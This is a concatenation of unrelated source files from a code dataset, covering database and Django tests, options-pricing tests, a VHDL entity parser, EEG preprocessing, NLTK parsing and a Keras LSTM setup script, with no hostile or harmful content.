self.assertEqual(p1.last_name, p2.last_name)\n self.assertEqual(p1.age, p2.age)\n\n tparams = dict(name=\"Treyfus Cucuss\", type=\"person\")\n t1 = Thing(tparams)\n t2 = Thing(tparams)\n\n # Insert a thing to run upserts against\n self.assertIsNone(t1.id)\n mab.insert_model(t1)\n self.assertIsNotNone(t1.id)\n\n # Make sure that t2 has no id\n self.assertIsNone(t2.id)\n\n # Upsert it, but don't force the update, which should result in no ID being assigned.\n mab.insert_model(t2, upsert=Upsert(Upsert.DO_UPDATE, (\"name\", ), False))\n self.assertIsNone(t2.id)\n\n # Upsert it, but force the update, so the result should now have an ID, and it should be the\n # same ID as the first.\n mab.insert_model(t2, upsert=Upsert(Upsert.DO_UPDATE, (\"name\", ), True))\n self.assertIsNotNone(t2.id)\n self.assertEqual(t1.id, t2.id)\n\n mab.rollback()\n\n def test_delete_model(self):\n with get_model_access() as mab:\n pc = mab.count(\"people\")\n mab.delete_model(Person(id=11))\n self.assertEqual(pc - 1, mab.count(\"people\"))\n self.assertIsNone(mab.find_model_by_id(Person, 11))\n\n ptc = mab.count(\"peoples_things\")\n mab.delete_model(PersonThing(person_id=1, thing_id=1))\n self.assertEqual(ptc - 1, mab.count(\"peoples_things\"))\n self.assertIsNone(mab.find_model_by_id(PersonThing, [1, 1]))\n\n mab.delete_model(PersonThing, [1, 2])\n self.assertEqual(ptc - 2, mab.count(\"peoples_things\"))\n self.assertIsNone(mab.find_model_by_id(PersonThing, [1, 1]))\n\n mab.rollback()\n\n def test_find_or_upsert(self):\n class UpsertTest(ModelBase):\n table_name = \"upserts\"\n attrs = { \"name\": None, \"type\": None }\n\n def insert(ma, name, type):\n return ma.insert_model(UpsertTest(name=name, type=type))\n\n def upsert(ma, name, type, assign):\n with transaction(ma):\n assign.append(ma.find_or_upsert(UpsertTest, dict(name=name, type=type), comp=dict(name=name), return_status=True))\n\n with get_model_access() as ma1, get_model_access() as ma2:\n with autocommit(ma1):\n ma1.execute(\"drop table if 
exists upserts\")\n ma1.execute(\"create table upserts (id serial not null primary key, name text not null unique, type text not null, created_at timestamptz not null default now(), updated_at timestamptz not null default now());\")\n ma1.execute(\"truncate table upserts\")\n\n # 1) Two transactions: a) create b) upsert a) commit - check that a and b have same id\n # 2) Two transactions: a) create b) upsert a) rollback - check that a and b have differnet ids\n\n with transaction(ma1):\n mod1 = insert(ma1, \"Trey\", \"person\")\n mod2a = []\n thread1 = Thread(target=lambda: upsert(ma2, \"Trey\", \"person\", mod2a))\n thread1.start()\n sleep(0.25)\n self.assertTrue(thread1.is_alive())\n thread1.join()\n mod2, mod2_status = mod2a[0]\n self.assertEqual(mod2_status, \"duplicate\")\n self.assertEqual(mod1.id, mod2.id)\n\n with transaction(ma1):\n mod3 = insert(ma1, \"Julie\", \"person\")\n mod4a = []\n thread2 = Thread(target=lambda: upsert(ma2, \"Julie\", \"person\", mod4a))\n thread2.start()\n sleep(0.25)\n self.assertTrue(thread2.is_alive())\n raise RollbackTransaction()\n thread2.join()\n mod4, mod4_status = mod4a[0]\n self.assertEqual(mod4_status, \"created\")\n self.assertNotEqual(mod3.id, mod4.id)\n\n mod5a = []\n upsert(ma1, \"Trey\", \"person\", mod5a)\n mod5, mod5_status = mod5a[0]\n self.assertEqual(mod5_status, \"found\")\n self.assertEqual(mod5.id, mod1.id)\n","sub_path":"tests/db/access/test_model_access.py","file_name":"test_model_access.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"2890099","text":"#!/usr/bin/env python \n\n\n# Copyright 2021 Gregory Ditzler \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this \n# software and associated documentation files (the \"Software\"), to deal in the Software \n# without restriction, including without limitation the rights to use, copy, modify, \n# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to \n# permit persons to whom the Software is furnished to do so, subject to the following \n# conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies \n# or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, \n# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR \n# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE \n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT \n# OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR \n# OTHER DEALINGS IN THE SOFTWARE.\n\n\ndef jaccard(a, b):\n \"\"\"\n Jaccard index\n \"\"\"\n a, b = set(a), set(b)\n return 1.*len(a.intersection(b))/len(a.union(b))\n\ndef kuncheva(a, b, K): \n \"\"\"\n Kuncheva index \n \"\"\"\n a, b = set(a), set(b)\n r = 1.*len(a.intersection(b))\n k = 1.*len(a)\n return 1.*(r*K - k**2)/(k*(K - k)) \n\n\ndef total_consistency(sel_feats, n_features): \n \"\"\"\n Measure the Jaccard and Kuncheva stability for sets of feature subsets that\n were collected from cross fold validation. 
\n \"\"\"\n n = len(sel_feats)\n\n ck, cj = 0., 0.\n k = 0\n for i in range(n): \n for j in range(n): \n if j > i: \n cj += jaccard(sel_feats[i], sel_feats[j])\n ck += kuncheva(sel_feats[i], sel_feats[j], n_features)\n k += 1\n return cj/k, ck/k ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387112210","text":"import options\nimport numpy as np\n\ndef equal(a, b, p=10):\n \"\"\"\n Checks that the two arrays are equal to a very small degree of precision.\n \"\"\"\n truths = np.abs(a - b) < 10**(-p)\n\n if type(truths) is np.ndarray:\n return np.mean(truths) == 1\n else:\n return truths\n\n\ndef test_value():\n\n val = options.payoff_contract(\n contract={\"type\":\"call\", \"position\":\"buy\", \"strike\":1.0, \"premium\":0.045, \"expiration\":45},\n price = 10000.0)\n\ndef test_vertical_put_credit_spread():\n\n contracts = [\n {\"type\":\"put\", \"position\":\"sell\", \"strike\":1.1, \"premium\":0.045, \"expiration\":45},\n {\"type\":\"put\", \"position\":\"buy\", \"strike\":1.0, \"premium\":0.035, \"expiration\":45}\n ]\n premium = 0.045 - 0.035 # This is how much premium we earned\n\n # Test the payoff diagram\n prices, pay = options.payoff(contracts)\n exppay = np.array([premium + 1.0 - 1.1, premium + 1.0 - 1.1, premium, premium])\n assert equal(pay, exppay)\n\n # Test the max loss\n max_loss = options.maxloss(contracts)\n assert equal(max_loss, 1.0 - 1.1 + premium)\n\n # Test the expected value\n val = options.value(contracts, 1.2, 0.5)\n val2 = options.vertical_put_credit_spread(1.2, 0.5, 45, 1.0, 0.035, 1.1, 0.045)\n assert np.abs(val*100 - val2[0]) < 10**(-10)\n\n # Test the annualised rate of return\n assert equal(val2[1], options.annret(val, max_loss, 45))\n\ndef test_payoff_vertical_call_credit_spread():\n\n contracts = [\n {\"type\":\"call\", \"position\":\"sell\", \"strike\":1.0, \"premium\":0.045, \"expiration\":45},\n {\"type\":\"call\", \"position\":\"buy\", \"strike\":1.1, \"premium\":0.035, \"expiration\":45}\n ]\n premium = 0.045 - 0.035 # This is how much premium we earned\n\n # Test the payoff diagram\n prices, pay = options.payoff(contracts)\n exppay = np.array([premium, premium, premium + 1.0 - 1.1, premium + 1.0 - 1.1])\n assert equal(pay, exppay)\n\n # Test the max loss\n max_loss = options.maxloss(contracts)\n assert equal(max_loss, 1.0 - 1.1 + premium)\n\n # Test the expected value\n val = options.value(contracts, 1.2, 0.5)\n val2 = options.vertical_call_credit_spread(1.2, 0.5, 45, 1.0, 0.045, 1.1, 0.035)\n assert np.abs(val*100 - val2[0]) < 10**(-9)\n\n\ndef test_selling_iron_condor():\n\n contracts = [\n {\"type\":\"put\", \"position\":\"buy\", \"strike\":84.5, \"premium\":0.46, \"expiration\":14},\n {\"type\":\"put\", \"position\":\"sell\", \"strike\":85, \"premium\":0.535, \"expiration\":14},\n {\"type\":\"call\", \"position\":\"sell\", \"strike\":90, \"premium\":0.635, \"expiration\":14},\n {\"type\":\"call\", \"position\":\"buy\", \"strike\":90.5, \"premium\":0.4, \"expiration\":14},\n ]\n\n premium = options.cost(contracts) # This is how much premium we earned\n\n # Test the amount earned\n assert premium == -0.46 + 0.535 + 0.635 - 0.4\n assert equal(premium, 0.31) # Value given by dough.com\n\n # Test the payoff diagram\n prices, pay = options.payoff(contracts)\n expprices = np.array([0, 84.5, 85, 90, 90.5])\n exppay = np.array([-0.5, -0.5, 0, 0, -0.5, -0.5]) + premium\n assert equal(pay, exppay, 8)\n assert 
equal(prices[:-1], expprices)\n\n # Test the max loss\n max_loss = options.maxloss(contracts)\n assert equal(max_loss, premium - 0.5, 8)\n\n # Build the distribution\n # In dough, volatility is taken from the table view of the trading window\n # I'm using the IV from the expiration month in the top right corner of\n # the table.\n dist = options.Lognormal.from_IV(88.06, 0.203, 14)\n\n # Test the probability in/out of the money\n assert np.round(options.prob_itm(contracts[0], dist), 2) == 0.15\n assert np.round(options.prob_itm(contracts[1], dist), 2) == 0.19\n assert np.round(options.prob_itm(contracts[2], dist), 2) == 0.29\n assert np.round(options.prob_itm(contracts[3], dist), 2) == 0.25 # dough.com said 0.24\n assert np.round(options.prob_otm(contracts[0], dist), 2) == 0.85\n assert np.round(options.prob_otm(contracts[1], dist), 2) == 0.81\n assert np.round(options.prob_otm(contracts[2], dist), 2) == 0.71\n assert np.round(options.prob_otm(contracts[3], dist), 2) == 0.75 # dough.com said 0.76\n\n # Test profitable ranges\n ranges = options.profitable_ranges(contracts)\n assert len(ranges) == 3\n assert ranges[0][0] == 85-0.31\n assert ranges[0][1] == 85\n assert ranges[1][0] == 85\n assert ranges[1][1] == 90\n assert ranges[2][0] == 90\n assert ranges[2][1] == 90 + 0.31\n\n # Test probability of profit\n # Dough.com says it should be 0.58. But they do change this to meaning make\n # at least one penny. I'm assuming continuous price here.\n prob_profit = options.prob_profit(contracts, dist)\n assert np.round(prob_profit, 2) == 0.57\n\n # Test the expected value\n val = options.value(contracts, 88.06, 0.203)\n assert equal(val, 0.0917671259072)\n\n # # Test the annualised rate of return\n # assert equal(val2[1], options.annret(val, max_loss, 45))\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"202034210","text":"'''\nQuestion 2\n===========\n\nThere are few important things to consider while solving this question:\n\n1. Since the server log file is large , one must not attempt to load\nthe entire file into memory. If an attempt to load the entire file is made,\nthe system shall crash.\n\nMethod to overcome 1:\n---------------------\nRead the file line by line.\nThat is, just read and process only 1 line at a time.\n\n\n2. The file should be loaded to a filesystem or database in a performant way.\nThe final goal of the server log processing is to gather insights at the end\nof the pipeline.\n\nMethod to accomplish 2:\n------------------------\nAfter reading and parsing , we store the data in Amazon Elastic search.\nWe can choose Elastic search as its very fast\nin searching among millions of records because of its lucene based indexing.\n\nAnother advantage of using it is having \"drill-down\" property which can be very\nhandy for even non-engineers to analyse the data stored.\nApart from that, it has inbuit support for kibana dashboard which might help\nin creating good visualization for the events occuring.\n\nSo, we can create an Elastic search \"index\" say \"server_logs\".\nThis index can contain \"types\" where each type corresponds to the \"event-type\" in\nour log.\n\nAnalogy of relational database and elastic search is as follows:\n\n\n MySQL => Databases => Tables => Columns/Rows\n Elasticsearch => Indices => Types => Documents with Properties\n\n3. 
Build in checks for reducing job errors:\n\nSince we are using Elastic search , it becomes easier to acheive this.\nSince each event-type correspornds to a particular 'type' in elastic search,\nthere is no question of creating a new 'type' for a previously recorded event-type,\nthe elastic search itself shall block it.\nAlso, while a creating a new 'type' in elastic search, we get the freedom of\ndefining the \"properties of Document\" as each document or record shall reside\nin the \"type\".\n\nSo, even if 1 record has some irrelvant data or erroneous data, that will not\nbe part of the documents present in a \"type\"\n\n\nPsedocode:\n\n'''\nElasticsearch_index = 'server_logs'\n\ndef read_parse_file(filename):\n with open(filename, 'r') as filehandle:\n while(True):\n line = filehandle.readLine()\n if not line:\n break\n else:\n list_of_values = line.split(\",\")\n event = list_of_values[2]\n store_into_elastic_search(Elasticsearch_index, event, list_of_values)\n\ndef store_into_elastic_search(Elasticsearch_index, event, list_of_values):\n if check_event_type_exists_in_index(Elasticsearch_index, event):\n put_record_to_elastic_search(Elasticsearch_index, event, list_of_values)\n else:\n if create_new_type(Elasticsearch_index, event):\n put_record_to_elastic_search(Elasticsearch_index, event, list_of_values)\n\n\ndef check_event_type_exists_in_index(Elasticsearch_index, event):\n if type_exists(Elasticsearch_index, event):\n return True\n else:\n return False\n\ndef create_new_type(Elasticsearch_index, type):\n properties = read_config_properties(Elasticsearch_index, type)\n if create_new_type_inbuilt_function(properties, Elasticsearch_index, type):\n return True\n else:\n return False\n\n\ndef put_record_to_elastic_search(Elasticsearch_index, event, list_of_values):\n put_record_to_elastic_search_inbuilt_function(Elasticsearch_index, event, list_of_values)\n return\n","sub_path":"question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"548682406","text":"import collections\nimport logging\n\nfrom slvcodec import package, typ_parser, symbolic_math, typs\nfrom slvcodec.typs import ResolutionError\n\n\nlogger = logging.getLogger(__name__)\n\nCLOCK_NAMES = ('clk', 'clock')\n\n\ndef process_files(filenames, must_resolve=True):\n '''\n Takes a list of filenames,\n parses them with the VUnit parser\n and then processes them in slvcodec classes.\n\n The packages references to one another are resolved as\n are the references to types and constants in the entity\n interfaces.\n '''\n entities = {}\n packages = []\n for filename in filenames:\n parsed = package.parsed_from_filename(filename)\n if parsed.entities:\n assert(len(parsed.entities) == 1)\n p = process_parsed_entity(parsed)\n entities[p.identifier] = p\n assert(not parsed.packages)\n if parsed.packages:\n pkg = package.process_parsed_package(parsed)\n packages.append(pkg)\n resolved_packages = package.resolve_packages(packages)\n resolved_entities = dict([(e.identifier, e.resolve(resolved_packages, must_resolve=must_resolve))\n for e in entities.values()])\n return resolved_entities, resolved_packages\n\n\ndef process_parsed_entity(parsed_entity):\n '''\n Processes the parse entity (output from VUnit vhdl_parser)\n into an UnresolvedEntity class.\n '''\n p_generics = parsed_entity.entities[0].generics\n generics = [typs.Generic(\n name=g.identifier,\n 
typ=typ_parser.process_subtype_indication(g.subtype_indication),\n ) for g in p_generics]\n p_ports = parsed_entity.entities[0].ports\n ports = [Port(\n name=p.identifier,\n direction=p.mode,\n typ=typ_parser.process_subtype_indication(p.subtype_indication),\n ) for p in p_ports]\n gd = dict([(g.name, g) for g in generics])\n pd = collections.OrderedDict([(p.name, p) for p in ports])\n uses = package.get_parsed_package_dependencies(parsed_entity)\n p = UnresolvedEntity(\n identifier=parsed_entity.entities[0].identifier,\n generics=gd,\n ports=pd,\n uses=uses,\n )\n return p\n\n\nclass Port:\n\n def __init__(self, name, direction, typ):\n self.name = name\n self.direction = direction\n self.typ = typ\n\n\nclass UnresolvedEntity:\n '''\n Keeps track of the generics, ports and package dependencies of\n an entity.\n '''\n\n def __init__(self, identifier, generics, ports, uses):\n self.identifier = identifier\n self.generics = generics\n self.ports = ports\n self.uses = uses\n\n def resolve(self, packages, must_resolve=True):\n resolved_uses = package.resolve_uses(self.uses, packages, must_resolve=must_resolve)\n available_types, available_constants = package.combine_packages(\n [u.package for u in resolved_uses.values()])\n available_constants = package.exclusive_dict_merge(\n available_constants, self.generics)\n resolved_ports = collections.OrderedDict()\n for name, port in self.ports.items():\n try:\n if port.typ in available_types:\n resolved_typ = available_types[port.typ]\n elif isinstance(port.typ, str):\n raise Exception('Cannot resolve port typ {}'.format(port.typ))\n else:\n resolved_typ = port.typ.resolve(available_types, available_constants)\n resolved_port = Port(name=port.name, direction=port.direction,\n typ=resolved_typ)\n resolved_ports[name] = resolved_port\n except ResolutionError as e:\n # If we can't resolve and `must_resolve` isn't True then we just\n # skip ports that we can't resolve.\n if must_resolve:\n raise e\n e = Entity(\n identifier=self.identifier,\n generics=self.generics,\n ports=resolved_ports,\n uses=resolved_uses,\n )\n return e\n\n\nclass Entity(object):\n '''\n An entity with all types and constants in the ports resolved.\n '''\n\n resolved = True\n\n def __init__(self, identifier, generics, ports, uses):\n self.identifier = identifier\n self.generics = generics\n self.ports = ports\n self.uses = uses\n\n def __str__(self):\n return 'Entity({})'.format(self.identifier)\n\n def __repr__(self):\n return str(self)\n\n def inputs_to_slv(self, inputs, generics):\n slvs = [] \n for port in self.ports.values():\n if (port.direction == 'in') and (port.name not in CLOCK_NAMES):\n d = inputs.get(port.name, None)\n if d is None:\n w = typs.make_substitute_generics_function(generics)(port.typ.width)\n o = 'U' * symbolic_math.get_value(w)\n else:\n o = port.typ.to_slv(d, generics)\n slvs.append(o)\n slv = ''.join(reversed(slvs))\n return slv\n\n def ports_from_slv(self, slv, generics, direction):\n pos = 0\n outputs = {}\n for port in self.ports.values():\n if (port.direction == direction) and (port.name not in CLOCK_NAMES):\n w = typs.make_substitute_generics_function(generics)(port.typ.width)\n width = symbolic_math.get_value(w)\n intwidth = int(width)\n assert(width == intwidth)\n if pos == 0:\n piece = slv[-intwidth:]\n else:\n piece = slv[-pos-intwidth: -pos]\n pos += intwidth\n o = port.typ.from_slv(piece, generics)\n outputs[port.name] = o\n return outputs\n\n def outputs_from_slv(self, slv, generics):\n slv = slv.strip()\n data = self.ports_from_slv(slv, 
generics, 'out')\n return data\n\n def inputs_from_slv(self, slv, generics):\n slv = slv.strip()\n data = self.ports_from_slv(slv, generics, 'in')\n return data\n","sub_path":"slvcodec/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482362116","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.main_app, name='main_app'),\n url(r'orders/$', views.orders, name='orders'),\n url(r'dicts/$', views.dicts, name='dicts'),\n url(r'dicts/services/$', views.dict_services_list, name='dict_services_list'),\n url(r'dicts/clients/$', views.dict_clients_list, name='dict_clients_list'),\n url(r'dicts/clients/(?P[0-9]+)/$', views.dict_clients_detail, name='dict_clients_detail'),\n]","sub_path":"barbershopoffice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229714193","text":"import nltk\nimport sys\nfrom nltk import load_parser\nimport subprocess\n\n#sentence = 'Angus gives a bone to every dog'.split()\n\n#sentence = 'You are imagining things'.split()\n#sentence = 'There is a price on my head'.split()\nsentence = 'your big opportunity is flying out of here'.split()\n\nsentence2 = str(sys.argv[1]).split()\n\ncp = load_parser('cfgrammar.fcfg', trace=0)\n\n\nfor tree in cp.parse(sentence2):\n print(tree.label()['SEM'])\n #for Java\n file = open(\"../../Java/Traduttore/src/fol.txt\", \"w\")\n file.write(str(tree.label()['SEM']))\n file.close()\n\n #for Python\n file = open(\"./src/fol.txt\", \"w\")\n file.write(str(tree.label()['SEM']))\n file.close()\n break\n\n\nsubprocess.call(['java', '-jar', '../../Java/Traduttore/Traduttore.jar'])\n\n\n\n","sub_path":"Python/TLN-Mazzei/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124065022","text":"from django.test import TestCase, Client\nfrom django.test.client import RequestFactory\nfrom .views import *\nfrom .models import Movie\nfrom django.core.urlresolvers import reverse\nfrom datetime import datetime\n\nclass Views_Test(TestCase):\n\n def setUp(self):\n self.movies = [\n Movie.objects.create(title = \"Film\", genere = \"komedia\", time = 120, text = \"nannanaa\"),\n Movie.objects.create(title = \"Siema\", genere = \"akcja\", time = 110, text = \"nana\"),\n Movie.objects.create(title = \"Komedia\", genere = \"komedia\", time = 130, text = \"nanna\")\n ]\n self.movie = Movie.objects.create(title = \"Fajny\", genere = \"Komedia\", time = 100, text = \"annaan\")\n\n self.room = Room.objects.create(seat_count = 20, room_number = 2)\n self.showing = Showing.objects.create(\n movie = self.movies[0],\n # Do zmiany - niech bę∂zie godzina seansu zamiast now()\n time = datetime.now(),\n room = self.room\n )\n \n self.client = Client()\n\n def test_movie_list(self):\n url = reverse('movie_list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/movie_list.html')\n\n def test_movie_list_dos(self):\n url = reverse('movie_list')\n rf = RequestFactory()\n request = rf.get(url)\n\n movies = Movie.objects.order_by('title')\n expected_response = render(request, 'cinema/movie_list.html', {'movies': movies})\n\n response = movie_list(request)\n 
self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content, expected_response.content)\n \n def test_reservation_form(self):\n url = reverse('reservation_new', kwargs={\"pk\": self.showing.pk})\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/reservation_new.html')\n\n\n def test_reservation_form_showing_not_exist(self):\n url = reverse('reservation_new', kwargs={\"pk\": 0})\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_showing_form(self):\n url = reverse('showing_new', kwargs={\"pk\": self.movies[0].pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/showing_new.html')\n\n def test_movie_detail(self):\n url = reverse('movie_detail', kwargs={\"pk\": self.movie.pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/movie_detail.html')\n\n def test_showing_delete(self):\n url = reverse('showing_delete', kwargs={\"pk\": self.showing.pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/showing_delete_success.html')\n\n def test_showing_confirm_delete(self):\n url = reverse('showing_confirm_delete', kwargs={\"pk\": self.showing.pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/showing_remove.html')\n\n def test_reservation_new_form_post(self):\n url = reverse('reservation_new', kwargs={\"pk\": self.showing.pk})\n response = self.client.post(url, {'seat_count': 2, 'email': 'katarzyna@op.pl'})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/reservation_success.html')\n\n def test_showing_new_form_post(self):\n url = reverse('showing_new', kwargs={\"pk\": self.movies[0].pk})\n response = self.client.post(url, {'time': '2018-12-12 10:00', 'room': self.room.pk})\n self.assertEqual(response.status_code, 302)\n self.assertRedirects(response, reverse('movie_list'))\n\n def test_reservation_new_form_empty_email(self):\n url = reverse('reservation_new', kwargs={\"pk\": self.showing.pk})\n response = self.client.post(url, {})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/reservation_new.html')\n\n","sub_path":"cinema/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77009557","text":"import pylab as plt\nfrom sklearn.datasets import fetch_mldata\nimport numpy as np\n\n\ndef save(image, name):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n imgplot = ax.imshow(image, cmap=plt.cm.Greys)\n imgplot.set_interpolation('nearest')\n ax.xaxis.set_ticks_position('top')\n ax.yaxis.set_ticks_position('left')\n plt.imsave(name)\n # plt.savefig(name)\n\nmnist = fetch_mldata('MNIST original', data_home=\".\")\ny = mnist.target\nX = - mnist.data.reshape(len(y), 28, 28) + 255\n\ncounter = np.zeros(10)\nfrom itertools import izip\nfor image, label in izip(X, y):\n label = int(label)\n plt.imsave(\"%d_%d.png\" % (label, counter[label]), image, cmap=plt.cm.gray)\n counter[label] += 
1\n","sub_path":"download_mnist.py","file_name":"download_mnist.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"437880533","text":"#442. Find All Duplicates in an Array. Medium. 62%.\n\n#Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array), some elements appear twice and others appear once.\n#Find all the elements that appear twice in this array.\n#Could you do it without extra space and in O(n) runtime?\n\nclass Solution:\n def findDuplicates(self, nums: List[int]) -> List[int]:\n nums2 = []\n char = {}\n for i in nums:\n if i in char:\n nums2.append(i)\n else:\n char[i] = True\n return(nums2)\n \n# 2min\n","sub_path":"089.py","file_name":"089.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519366780","text":"import numpy as np\nfrom sklearn import preprocessing\n\n\n# Averages selected time intervals in each out_features[i][j]\n# that have been specified using param.intervals.\n# Returns 2D feature vectors n_of_examples x (number_of_time_windows x number_of_channels)\ndef windowed_means(out_features, param):\n # in all feature vectors\n output_features = []\n for i in range(out_features.shape[0]):\n feature = []\n # for all EEG channels\n for j in range(out_features.shape[1]):\n time_course = out_features[i][j]\n for k in range(param.intervals.shape[0]):\n borders = param.intervals[k] * param.sampling_fq\n feature.append(np.average(time_course[int(borders[0] - 1):int(borders[1] - 1)]))\n output_features.append(feature)\n# print(np.shape(output_features))\n return preprocessing.scale(np.array(output_features), axis=1)\n\n\n# Add a singleton dimension to enable CNN Keras classification\ndef cnn_reshape(out_features):\n # reshape the data to add a singleton dimension\n out_features = out_features.reshape(out_features.shape[0], out_features.shape[1], out_features.shape[2], 1)\n return out_features\n\n\n# From out_features, remove all epochs with any channel\n# exceeding ampl_threshold in the absolute value.\ndef reject_amplitude(out_features, out_labels, param):\n # in all feature vectors\n output_features = []\n retain_targets = []\n for i in range(out_features.shape[0]):\n feature = []\n reject = False\n # for all EEG channels\n for j in range(out_features.shape[1]):\n if np.max(np.absolute(out_features[i][j])) > param.rej_threshold:\n reject = True\n if not reject:\n output_features.append(out_features[i])\n retain_targets.append(not reject)\n output_features = np.array(output_features)\n if param.verbose:\n print('Rejected: ', (1 - output_features.shape[0] / out_features.shape[0]) * 100, ' %.')\n return output_features, out_labels[retain_targets, :]\n\n\n# Averages every N trials in EEG data structure\n# out_features - EEG feature vectors\n# averaging - N - number of trials to average together\ndef neighbor_average_all(out_features, out_labels, averaging_factor):\n if averaging_factor <= 1:\n return [out_features, out_labels]\n\n # separate only targets/non-target features\n out_t_features = out_features[out_labels[:, 0] == 1, :]\n out_n_features = out_features[out_labels[:, 1] == 1, :]\n\n # ensemble average targets and non-targets features\n out__t_features_avg = average(out_t_features, averaging_factor)\n out__n_features_avg = average(out_n_features, averaging_factor)\n\n # create corresponding labels\n out_t_labels = np.tile(np.array([1, 0]), (out__t_features_avg.shape[0], 
1))\n out_n_labels = np.tile(np.array([0, 1]), (out__n_features_avg.shape[0], 1))\n\n # connect target/non-target features/labels\n out_labels = np.vstack((out_t_labels, out_n_labels))\n out_features = np.concatenate((out__t_features_avg, out__n_features_avg), axis=0)\n\n return [out_features, out_labels]\n\n\n# Average features only by a certain factor\ndef average(out_features, averaging_factor):\n out_eeg_data = []\n for trial in range(0, out_features.shape[0] - 1, averaging_factor):\n avg_fv = np.average(out_features[trial:(trial + averaging_factor), :], axis=0)\n out_eeg_data.append(avg_fv)\n return np.array(out_eeg_data)","sub_path":"main/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169491383","text":"# -*- coding: utf-8 -*-\n\n#from __future__ import print_function\n#from keras.models import Sequential\nimport keras.backend as K\nfrom keras.callbacks import LearningRateScheduler\nimport shutil\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers import Input, Embedding, merge\nfrom keras.utils import np_utils\nfrom keras.models import Model\nimport pandas as pd\nimport numpy as np\nfrom keras.optimizers import Adam\nfrom keras.regularizers import l2\nimport csv\n#import random \nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.pylab import mpl\nfrom matplotlib.font_manager import _rebuild\n#from sklearn import preprocessing\n#如需进行数据归一化则写入下一行代码\nfrom sklearn.preprocessing import MinMaxScaler\n#=====================================================================\nPARAMS = [[0.001,50,10,1],[0.001,50,10,8] ,[0.001,50,10,32],\n [0.001,10,10,16],[0.001,100,10,16],[0.001,500,10,16]]\nfor PARAM_NUM in range(3,8):\n #PARAM_NUM = 3 #在这里输���参数号\n NAME = u\"无照经营\"\n FILE_NAME = NAME+\"-所有街道数据.csv\"\n F_NAME = u\"../图表/LSTM图表/分站点预测/参数\"+str(PARAM_NUM)+\"/\"+NAME+\"/\"\n #=====================================================================\n #将下面这个参数从1开始跑,\n #比如num_site=1跑一次,num_site=2跑一次,num_site=3跑一次。。。以此类推,直到系统提示“本文件所有站点预测完毕”为止\n\n #num_site=12\n\n\n CURRENT_PARAMS = PARAMS[PARAM_NUM-2]\n #=====================================================================\n #my_lr=0.001 #初始学习率\n my_lr=CURRENT_PARAMS[0]\n #my_node=50 #LSTM层的节点数\n my_node = CURRENT_PARAMS[1]\n #delay=10 #根据前delay个数据预测下一个\n delay=CURRENT_PARAMS[2]\n #my_batch_size=1 #batch_size\n my_batch_size=CURRENT_PARAMS[3]\n\n #=====================================================================\n os.makedirs(F_NAME)\n os.makedirs(u\"../LSTM分站点输出预测数据文件/参数\" + str(PARAM_NUM) + \"/\" + NAME + \"/\")\n os.makedirs(u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+u'极端数据图表/')\n\n 